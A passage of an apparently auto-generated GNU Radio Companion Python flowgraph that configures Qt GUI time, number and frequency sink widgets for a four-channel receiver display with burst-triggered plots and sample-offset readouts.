self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_0_0_0_0_win, 0, 4, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(4, 5):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN3", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0_0_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_0_0_0_win, 0, 3, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN2", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_0_0_win, 0, 2, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN1", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_0_win, 0, 1, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN0", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_win, 0, 0, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1 = qtgui.time_sink_f(
8192, #size
samp_rate, #samp_rate
"", #name
4 #number of inputs
)
self.qtgui_time_sink_x_0_1.set_update_time(0.010)
self.qtgui_time_sink_x_0_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_1.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, thresh, trig_delay, trig_channel, "")
self.qtgui_time_sink_x_0_1.enable_autoscale(True)
self.qtgui_time_sink_x_0_1.enable_grid(False)
self.qtgui_time_sink_x_0_1.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1.enable_control_panel(False)
self.qtgui_time_sink_x_0_1.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_1.disable_legend()
labels = ['Chan0', 'Chan1', 'Chan2', 'Chan3', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(4):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_1.addWidget(self._qtgui_time_sink_x_0_1_win, 0, 0, 1, 4)
for r in range(0, 1):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(0, 4):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_0_1 = qtgui.time_sink_f(
1024, #size
samp_rate, #samp_rate
"", #name
1 #number of inputs
)
self.qtgui_time_sink_x_0_0_1.set_update_time(0.010)
self.qtgui_time_sink_x_0_0_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_0_1.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_0_1.enable_tags(-1, True)
self.qtgui_time_sink_x_0_0_1.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0_1.enable_autoscale(True)
self.qtgui_time_sink_x_0_0_1.enable_grid(False)
self.qtgui_time_sink_x_0_0_1.enable_axis_labels(True)
self.qtgui_time_sink_x_0_0_1.enable_control_panel(False)
self.qtgui_time_sink_x_0_0_1.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_0_1.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_0_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_0_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_0_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_0_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_0_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_0_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_0_1_win = sip.wrapinstance(self.qtgui_time_sink_x_0_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_0_1_win, 4, 3, 2, 1)
for r in range(4, 6):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_0_0 = qtgui.time_sink_f(
1024, #size
samp_rate, #samp_rate
"", #name
1 #number of inputs
)
self.qtgui_time_sink_x_0_0_0.set_update_time(0.010)
self.qtgui_time_sink_x_0_0_0.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_0_0.enable_grid(False)
self.qtgui_time_sink_x_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_0_0.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_0_0_win, 4, 2, 2, 1)
for r in range(4, 6):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_0 = qtgui.time_sink_f(
1024, #size
samp_rate, #samp_rate
"", #name
1 #number of inputs
)
self.qtgui_time_sink_x_0_0.set_update_time(0.010)
self.qtgui_time_sink_x_0_0.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_0.enable_grid(False)
self.qtgui_time_sink_x_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_0.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_0_win, 4, 1, 2, 1)
for r in range(4, 6):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0 = qtgui.time_sink_f(
1024, #size
samp_rate, #samp_rate
"", #name
1 #number of inputs
)
self.qtgui_time_sink_x_0.set_update_time(0.010)
self.qtgui_time_sink_x_0.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
self.qtgui_time_sink_x_0.enable_autoscale(True)
self.qtgui_time_sink_x_0.enable_grid(False)
self.qtgui_time_sink_x_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0.enable_control_panel(False)
self.qtgui_time_sink_x_0.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_win, 4, 0, 2, 1)
for r in range(4, 6):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_number_sink_0 = qtgui.number_sink(
gr.sizeof_float,
0,
qtgui.NUM_GRAPH_NONE,
3
)
self.qtgui_number_sink_0.set_update_time(0.10)
self.qtgui_number_sink_0.set_title("samp_offset")
labels = ['0 to 1', '0 to 2', '0 to 3', '', '',
'', '', '', '', '']
units = ['samples', 'samples', 'samples', '', '',
'', '', '', '', '']
colors = [("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"),
("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black")]
factor = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
for i in xrange(3):
self.qtgui_number_sink_0.set_min(i, -1)
self.qtgui_number_sink_0.set_max(i, 1)
self.qtgui_number_sink_0.set_color(i, colors[i][0], colors[i][1])
if len(labels[i]) == 0:
self.qtgui_number_sink_0.set_label(i, "Data {0}".format(i))
else:
self.qtgui_number_sink_0.set_label(i, labels[i])
self.qtgui_number_sink_0.set_unit(i, units[i])
self.qtgui_number_sink_0.set_factor(i, factor[i])
self.qtgui_number_sink_0.enable_autoscale(False)
self._qtgui_number_sink_0_win = sip.wrapinstance(self.qtgui_number_sink_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_2.addWidget(self._qtgui_number_sink_0_win, 9, 0, 1, 3)
for r in range(9, 10):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.qtgui_freq_sink_x_0_1_0 = qtgui.freq_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_freq_sink_x_0_1_0.set_update_time(0.010)
self.qtgui_freq_sink_x_0_1_0.set_y_axis(-140, 10)
self.qtgui_freq_sink_x_0_1_0.set_y_label('Relative Gain', 'dB')
self.qtgui_freq_sink_x_0_1_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
self.qtgui_freq_sink_x_0_1_0.enable_autoscale(False)
self.qtgui_freq_sink_x_0_1_0.enable_grid(False)
self.qtgui_freq_sink_x_0_1_0.set_fft_average(1.0)
self.qtgui_freq_sink_x_0_1_0.enable_axis_labels(True)
self.qtgui_freq_sink_x_0_1_0.enable_control_panel(False)
if not False:
self.qtgui_freq_sink_x_0_1_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_freq_sink_x_0_1_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_freq_sink_x_0_1_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_freq_sink_x_0_1_0.set_line_label(i, labels[i])
self.qtgui_freq_sink_x_0_1_0.set_line_width(i, widths[i])
self.qtgui_freq_sink_x_0_1_0.set_line_color(i, colors[i])
self.qtgui_freq_sink_x_0_1_0.set_line_alpha(i, alphas[i])
self._qtgui_freq_sink_x_0_1_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0_1_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_1_0_win, 0, 3, 2, 1)
for r in range(0, 2):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_freq_sink_x_0_1 = qtgui.freq_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_freq_sink_x_0_1.set_update_time(0.010)
self.qtgui_freq_sink_x_0_1.set_y_axis(-140, 10)
self.qtgui_freq_sink_x_0_1.set_y_label('Relative Gain', 'dB')
self.qtgui_freq_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
self.qtgui_freq_sink_x_0_1.enable_autoscale(False)
self.qtgui_freq_sink_x_0_1.enable_grid(False)
self.qtgui_freq_sink_x_0_1.set_fft_average(1.0)
self.qtgui_freq_sink_x_0_1.enable_axis_labels(True)
self.qtgui_freq_sink_x_0_1.enable_control_panel(False)
if not False:
self.qtgui_freq_sink_x_0_1.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_freq_sink_x_0_1.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_freq_sink_x_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_freq_sink_x_0_1.set_line_label(i, labels[i])
self.qtgui_freq_sink_x_0_1.set_line_width(i, widths[i])
self.qtgui_freq_sink_x_0_1.set_line_color(i, colors[i])
self.qtgui_freq_sink_x_0_1.set_line_alpha(i, alphas[i])
self._qtgui_freq_sink_x_0_1_win = sip.wrapinstance(self.qtgui_freq_sink_x_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_1_win, 0, 2, 2, 1)
for r in range(0, 2):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_freq_sink_x_0_0 = qtgui.freq_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_freq_sink_x_0_0.set_update_time(0.010)
self.qtgui_freq_sink_x_0_0.set_y_axis(-140, 10)
self.qtgui_freq_sink_x_0_0.set_y_label('Relative Gain', 'dB')
self.qtgui_freq_sink_x_0_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
self.qtgui_freq_sink_x_0_0.enable_autoscale(False)
self.qtgui_freq_sink_x_0_0.enable_grid(False)
self.qtgui_freq_sink_x_0_0.set_fft_average(1.0)
self.qtgui_freq_sink_x_0_0.enable_axis_labels(True)
self.qtgui_freq_sink_x_0_0.enable_control_panel(False)
if not False:
self.qtgui_freq_sink_x_0_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_freq_sink_x_0_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_freq_sink_x_0_0.set_line_label(i, "Data {0}".format(i))
else:
